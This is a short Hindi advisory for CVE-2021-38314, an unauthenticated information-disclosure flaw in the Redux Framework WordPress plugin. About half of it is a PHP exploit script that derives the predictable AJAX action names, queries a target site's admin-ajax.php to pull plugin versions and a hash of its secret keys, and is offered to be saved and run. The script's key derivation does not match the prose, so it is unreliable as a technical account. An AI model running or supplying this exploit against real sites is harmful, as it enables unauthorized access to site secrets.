
cve-2021-38314 - अप्रमाणित संवेदनशील जानकारी का खुलासा
Gutenberg Template Library और Redux Framework प्लगइन <= 4.2.11 WordPress के लिए, redux-core/class-redux-core.php में includes फ़ंक्शन में कई AJAX क्रियाएं पंजीकृत थीं जो अप्रमाणित उपयोगकर्ताओं के लिए उपलब्ध थीं। ये क्रियाएं किसी विशेष साइट के लिए अद्वितीय थीं, लेकिन नियतात्मक और पूर्वानुमानित थीं क्योंकि वे साइट URL के md5 हैश पर आधारित थीं, जिसमें '-redux' का ज्ञात नमक मान था, और पिछले हैश का md5 हैश जिसमें '-support' का ज्ञात नमक मान था। इन AJAX क्रियाओं का उपयोग सक्रिय प्लगइन्स और उनके संस्करणों, साइट के PHP संस्करण, और साइट के AUTH_KEY को SECURE_AUTH_KEY के साथ जोड़कर बिना नमक वाले md5 हैश को पुनः प्राप्त करने के लिए किया जा सकता था [1][2]
<?php
$target = "https://target.com";
$key1 = md5("$target/-redux");
$key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1");
$key3 = md5($key2. '-support');
$redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/");
echo file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code");
.php एक्सटेंशन के साथ स्रोत कोड के रूप में सहेजें
